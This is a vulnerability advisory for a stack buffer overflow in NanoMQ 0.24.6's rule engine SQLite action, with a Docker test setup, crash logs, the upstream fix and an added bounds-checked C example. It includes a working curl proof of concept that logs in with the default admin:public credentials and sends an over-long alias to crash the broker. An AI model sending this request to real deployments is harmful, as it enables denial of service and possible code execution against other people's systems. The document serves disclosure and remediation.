NanoMQ Rules Engine Remote Buffer Overflow

=======
Summary
=======

A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of the default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.

Target: NanoMQ (emqx/nanomq:latest-full image tested)
Version Affected: ≤ 0.24.6

============
How It Works
============

The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from the unsafe use of string copy functions.

For the vulnerability to be exploitable, two conditions must be met:

1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint.

2. Rule Engine Must Be Compiled In: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries. However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if the HTTP server is enabled.

=======
Testing
=======

Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.
===========
Environment
===========

docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full

===
PoC
===

curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}"

After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.

====
Logs
====

*** buffer overflow detected ***: terminated
WARN /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081
NanoMQ Broker is started successfully!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received!

======
Impact
======

This vulnerability may lead to:

- Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.
- Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.

==========
Mitigation
==========

The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() call with snprintf(). This ensures that the string operation is bounds-checked, preventing the buffer overflow.
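The following is an added example, not NanoMQ's own code or the code from the fix commit, showing the bounded-copy pattern the mitigation describes: the CREATE TABLE statement is assembled with snprintf() into a fixed-size buffer and the return value is checked, so an alias that would not fit (such as the 180-character one from the test request above) is rejected instead of overrunning the stack. The buffer size SQL_BUF_SIZE, the exact statement shape, and the helper names build_create_table, build_or_null and repeated_alias are assumptions for this example; the advisory does not state NanoMQ's real buffer size or statement template.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size buffer for the generated statement. The advisory
 * does not state NanoMQ's real buffer size; 128 is small enough to show the
 * 180-byte alias from the PoC being rejected. */
#define SQL_BUF_SIZE 128

/*
 * Build "CREATE TABLE IF NOT EXISTS <table> (<alias> TEXT);" into out, which
 * holds out_size bytes. The statement shape is a simplification for this
 * example. snprintf() writes at most out_size bytes (NUL included) and
 * returns the length the untruncated string would have had, so comparing
 * that value against out_size detects an oversized input. A bare strcpy()
 * here would keep writing past the end of out; a bare snprintf() without the
 * check would stay in bounds but hand SQLite a silently truncated statement.
 */
bool build_create_table(char *out, size_t out_size,
                        const char *table, const char *alias)
{
    if (out == NULL || out_size == 0 || table == NULL || alias == NULL)
        return false;

    int n = snprintf(out, out_size,
                     "CREATE TABLE IF NOT EXISTS %s (%s TEXT);", table, alias);
    if (n < 0 || (size_t)n >= out_size) {
        out[0] = '\0';  /* did not fit: reject the rule rather than truncate */
        return false;
    }
    return true;
}

/* Builds into a static buffer and returns it, or NULL when the statement did
 * not fit. Used by main() below and by the tests. */
const char *build_or_null(const char *table, const char *alias)
{
    static char buf[SQL_BUF_SIZE];
    return build_create_table(buf, sizeof buf, table, alias) ? buf : NULL;
}

/* Constructed input: an alias of n 'A' characters (capped at 255), mirroring
 * the 180-character alias used in the advisory's test request. */
const char *repeated_alias(size_t n)
{
    static char a[256];
    if (n > sizeof a - 1)
        n = sizeof a - 1;
    memset(a, 'A', n);
    a[n] = '\0';
    return a;
}

int main(void)
{
    const char *ok = build_or_null("metrics", "qos");
    printf("short alias   : %s\n", ok ? ok : "(rejected)");

    const char *bad = build_or_null("metrics", repeated_alias(180));
    printf("180-byte alias: %s\n", bad ? bad : "(rejected, would not fit)");
    return 0;
}
```

The point worth keeping from this pattern is the return-value check: replacing strcpy() with snprintf() stops the overflow on its own, but without the check an over-long alias is cut off mid-identifier and reaches SQLite as a malformed statement, which surfaces only as the kind of "SQL error" line seen in the logs above. Rejecting the rule up front keeps both the memory safety and a clear error for the caller.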
The fix was introduced in this commit:

- https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81

Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability. Other mitigations could include ensuring the HTTP server or Rules Engine is disabled.

Jeremy Brown (jbrown3264/gmail), Jan 2026